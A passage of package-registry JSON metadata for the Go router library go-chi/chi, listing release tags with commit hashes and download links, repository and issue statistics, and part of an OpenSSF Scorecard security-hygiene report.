repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.256Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/github.com/%21go-chi/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Go-chi/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Go-chi/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Go-chi/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-chi%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":9878591,"name":"github.com/go-chi/chI","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/chI","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chI","keywords_array":[],"namespace":"github.com/go-chi","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:17.351Z","created_at":"2024-05-05T03:52:09.256Z","updated_at":"2026-08-12T02:06:17.351Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chI","install_command":"go get github.com/go-chi/chI","documentation_url":"https://pkg.go.dev/github.com/go-chi/chI#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not 